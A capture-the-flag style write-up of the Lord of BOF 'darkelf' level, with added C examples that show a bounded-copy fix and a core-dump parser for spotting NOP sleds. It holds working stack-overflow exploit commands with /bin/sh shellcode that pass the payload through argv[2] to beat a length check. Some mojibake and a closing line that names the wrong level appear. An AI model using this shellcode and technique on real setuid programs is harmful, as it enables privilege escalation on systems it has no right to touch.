wargame 🏴‍☠️ write-up/Lord of BOF

6. wolfman → darkelf

Kortsec1 2019. 5. 2. 18:06
[wolfman@localhost wolfman]$ cat -n darkelf.c 
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - darkelf 
     4	        - egghunter + buffer hunter + check length of argv[1]
     5	*/
     6	
     7	#include <stdio.h>
     8	#include <stdlib.h>
     9	
    10	extern char **environ;
    11	
    12	main(int argc, char *argv[])
    13	{
    14		char buffer[40];
    15		int i;
    16	
    17		if(argc < 2){
    18			printf("argv error\n");
    19			exit(0);
    20		}
    21	
    22		// egghunter 
    23		for(i=0; environ[i]; i++)
    24			memset(environ[i], 0, strlen(environ[i]));
    25	
    26		if(argv[1][47] != '\xbf')
    27		{
    28			printf("stack is still your friend.\n");
    29			exit(0);
    30		}
    31	
    32		// check the length of argument
    33		if(strlen(argv[1]) > 48){
    34			printf("argument is too long!\n");
    35			exit(0);
    36		}
    37	
    38		strcpy(buffer, argv[1]); 
    39		printf("%s\n", buffer);
    40	
    41	        // buffer hunter
    42	        memset(buffer, 0, 40);
    43	}

For 5. orc => wolfman, I solved it by putting all 100 \x90 bytes and the shellcode into argv[1].

But this time, starting at line 32, the length of argv[1] is restricted..
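An added example, not part of darkelf.c or of the original write-up: the two argv[1] checks written as a predicate, a helper that shows how much still spills past the 40-byte buffer, and the bounded copy that would have been the real fix. The point is that `strlen(argv[1]) > 48` checks against the wrong number: buffer is 40 bytes, so a 48-byte argument still overwrites the 8 bytes above it (the last four of which the crash below shows to be the return address), and the check looks at argv[1] only. The sample argument is constructed to the same shape as the one used later in this post; the function names are mine.

```c
/* Added example, not part of darkelf.c: darkelf's argv[1] checks as a
 * predicate, the bytes they still let past the buffer, and a bounded copy
 * that would have closed the hole. Function names are my own. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 40   /* darkelf's char buffer[40] */

/* Constructed sample, same shape as the argv[1] used in the write-up:
 * 44 filler bytes followed by four 0xbf bytes, 48 bytes in total. */
static const char *sample_argv1(void)
{
    static char s[49];
    memset(s, 'A', 44);
    memset(s + 44, 0xbf, 4);
    s[48] = '\0';
    return s;
}

/* darkelf accepts argv[1] when byte 47 is 0xbf and strlen <= 48.
 * The real program indexes argv[1][47] before measuring the length, so a
 * shorter argument makes it read whatever follows on the stack; here the
 * length is checked first so the predicate is safe on any input. Note that
 * 48 > BUF_SIZE: the check still admits 8 bytes past the buffer. */
static int darkelf_accepts(const char *arg)
{
    size_t n = strlen(arg);
    return n == 48 && (unsigned char)arg[47] == 0xbf;
}

/* Payload bytes strcpy writes beyond a buffer of bufsize bytes
 * (strcpy then writes the terminating NUL one byte further still). */
static size_t overflow_bytes(const char *arg, size_t bufsize)
{
    size_t n = strlen(arg);
    return n > bufsize ? n - bufsize : 0;
}

/* The fix: copy only if the string and its NUL fit. Returns 0 on success,
 * -1 if the input is too long; dst is left untouched on failure. */
static int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsize)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* darkelf's main body with the strcpy replaced by bounded_copy. */
static int darkelf_hardened(const char *arg)
{
    char buffer[BUF_SIZE];
    if (bounded_copy(buffer, sizeof buffer, arg) != 0) {
        printf("argument is too long!\n");
        return -1;
    }
    printf("%s\n", buffer);
    memset(buffer, 0, sizeof buffer);   /* same "buffer hunter" as darkelf */
    return 0;
}

int main(void)
{
    const char *arg = sample_argv1();
    printf("darkelf accepts: %d, bytes past buffer: %zu\n",
           darkelf_accepts(arg), overflow_bytes(arg, BUF_SIZE));
    return darkelf_hardened(arg);
}
```

The hardened copy compares against `sizeof buffer`, the only number that matters, instead of a constant chosen by hand; with it the 48-byte argument is refused before anything reaches the stack.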

 

Well then, we can just put it into argv[2]~

Shall we give it a try right away?

[wolfman@localhost wolfman]$ ./test `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf " + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)

coreํŒŒ์ผ ์“ฑ์“ฑ,,,

 

[wolfman@localhost wolfman]$ gdb -c core
#0  0xbfbfbfbf in ?? ()
(gdb) x/100wx $esp
0xbffffa60:	0x00000000	0xbffffaa4	0xbffffab4	0x40013868
0xbffffa70:	0x00000003	0x08048450	0x00000000	0x08048471
0xbffffa80:	0x08048500	0x00000003	0xbffffaa4	0x08048390
0xbffffa90:	0x0804864c	0x4000ae60	0xbffffa9c	0x40013e90
0xbffffaa0:	0x00000003	0xbffffba8	0xbffffbaf	0xbffffbe0
0xbffffab0:	0x00000000	0xbffffc5d	0xbffffc6f	0xbffffc87
0xbffffac0:	0xbffffca6	0xbffffcc8	0xbffffcd5	0xbffffe98
0xbffffad0:	0xbffffeb7	0xbffffed4	0xbffffee9	0xbfffff08
0xbffffae0:	0xbfffff13	0xbfffff2c	0xbfffff3c	0xbfffff44
0xbffffaf0:	0xbfffff4e	0xbfffff5e	0xbfffff6c	0xbfffff7a
0xbffffb00:	0xbfffff8b	0xbfffff96	0xbfffffa9	0xbfffffec
0xbffffb10:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffb20:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffb30:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffb40:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffb50:	0x000001f9	0x0000000c	0x000001f9	0x0000000d
0xbffffb60:	0x000001f9	0x0000000e	0x000001f9	0x00000010
0xbffffb70:	0x0f8bfbff	0x0000000f	0xbffffba3	0x00000000
0xbffffb80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffba0:	0x69000000	0x00363836	0x65742f2e	0x41007473
0xbffffbb0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbc0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbd0:	0x41414141	0x41414141	0xbf414141	0x00bfbfbf
0xbffffbe0:	0x90909090	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffbf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc40:	0x90909090	0x6850c031	0x68732f2f	0x69622f68
0xbffffc50:	0x50e3896e	0x99e18953	0x80cd0bb0	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd70:	0x00000000	0x00000000	0x00000000	0x00000000

The \x90 bytes are visible right away, so let's wrap it up with darkelf~
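To make the same observation mechanically, here is an added triage helper in C (my code, not part of the write-up or of the Lord of BOF challenge). It parses the `x/100wx` lines of the core dump above back into bytes, little-endian as gdb prints them on x86, and reports the longest run of a given byte value. On the excerpt above, embedded as sample input, it finds a 44-byte run of 0x41 starting at 0xbffffbaf (argv[1]) and a 100-byte run of 0x90 starting at 0xbffffbe0 (argv[2], which begins right after the NUL that ends argv[1]). argv[2] exists at all because the shell word-splits the unquoted backtick output at the space after the four \xbf bytes, which is why the `strlen(argv[1]) > 48` check never fired. A long NOP run inside the argument or environment area of a crash dump is one of the clearest post-mortem indicators of a stack-smashing attempt, which is why incident responders look for exactly this. The function names and the MAX_BYTES cap are my own.

```c
/* Added example, not from the write-up: rebuild the bytes behind gdb's
 * "x/Nwx" output and report the longest run of a given byte value.
 * A long run of 0x90 (NOP) in the argv/envp area of a core dump is a
 * strong post-mortem indicator of a stack-overflow payload. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define MAX_BYTES 4096   /* my own cap on the image size */

/* Sample input: the argv region of the core dump above, copied verbatim. */
static const char *sample_dump =
    "0xbffffba0:\t0x69000000\t0x00363836\t0x65742f2e\t0x41007473\n"
    "0xbffffbb0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n"
    "0xbffffbc0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n"
    "0xbffffbd0:\t0x41414141\t0x41414141\t0xbf414141\t0x00bfbfbf\n"
    "0xbffffbe0:\t0x90909090\t0x90909090\t0x90909090\t0x90909090\n"
    "0xbffffbf0:\t0x90909090\t0x90909090\t0x90909090\t0x90909090\n"
    "0xbffffc00:\t0x90909090\t0x90909090\t0x90909090\t0x90909090\n"
    "0xbffffc10:\t0x90909090\t0x90909090\t0x90909090\t0x90909090\n"
    "0xbffffc20:\t0x90909090\t0x90909090\t0x90909090\t0x90909090\n"
    "0xbffffc30:\t0x90909090\t0x90909090\t0x90909090\t0x90909090\n"
    "0xbffffc40:\t0x90909090\t0x6850c031\t0x68732f2f\t0x69622f68\n"
    "0xbffffc50:\t0x50e3896e\t0x99e18953\t0x80cd0bb0\t0x00000000\n";

struct image { uint32_t base; size_t len; uint8_t bytes[MAX_BYTES]; };
struct run   { uint32_t start; size_t len; };   /* address and length of a run */

/* Parse gdb x/wx lines into a contiguous byte image. Returns the number of
 * bytes recovered, or -1 on a malformed line, a gap, or image overflow. */
static long parse_dump(const char *text, struct image *img)
{
    char line[256];
    int first = 1;
    img->len = 0;
    for (const char *p = text; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        if (n >= sizeof line) return -1;
        memcpy(line, p, n);
        line[n] = '\0';
        p = nl ? nl + 1 : p + n;
        if (n == 0) continue;
        char *end;
        uint32_t addr = (uint32_t)strtoul(line, &end, 16);
        if (*end != ':') return -1;                        /* not an "0xADDR:" line */
        if (first) { img->base = addr; first = 0; }
        else if (addr != img->base + img->len) return -1;  /* gap between lines: refuse */
        for (char *tok = strtok(end + 1, " \t"); tok; tok = strtok(NULL, " \t")) {
            uint32_t w = (uint32_t)strtoul(tok, NULL, 16);
            if (img->len + 4 > MAX_BYTES) return -1;
            /* gdb prints words in host order; x86 is little-endian, so the
             * low byte of each word sits at the lowest address */
            for (int i = 0; i < 4; i++)
                img->bytes[img->len++] = (uint8_t)(w >> (8 * i));
        }
    }
    return (long)img->len;
}

/* Longest run of `byte` in the image (the first one wins on ties). */
static struct run longest_run(const struct image *img, uint8_t byte)
{
    struct run best = {0, 0}, cur = {0, 0};
    for (size_t i = 0; i < img->len; i++) {
        if (img->bytes[i] != byte) { cur.len = 0; continue; }
        if (cur.len == 0) cur.start = img->base + (uint32_t)i;
        cur.len++;
        if (cur.len > best.len) best = cur;
    }
    return best;
}

/* Parse `dump` and return the longest run of `byte`; {0, 0} on parse error. */
static struct run find_run(const char *dump, uint8_t byte)
{
    struct image img;
    struct run none = {0, 0};
    if (parse_dump(dump, &img) < 0) return none;
    return longest_run(&img, byte);
}

int main(void)
{
    struct run nops = find_run(sample_dump, 0x90);
    struct run fill = find_run(sample_dump, 0x41);
    printf("longest 0x90 run: %zu bytes at 0x%08x\n", nops.len, nops.start);
    printf("longest 0x41 run: %zu bytes at 0x%08x\n", fill.len, fill.start);
    return 0;
}
```

The parser refuses non-contiguous input on purpose: gdb elides nothing in `x/Nwx`, so a gap means the dump was pasted incompletely, and a run length computed across a gap would be wrong.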

 

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44 + "\x10\xfc\xff\xbf " + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ my-pass
euid = 506
kernel crashed
bash$ 

Isn't this too easy..ㅠㅠ Anyway, that's how wolfman was cleared again~~

 
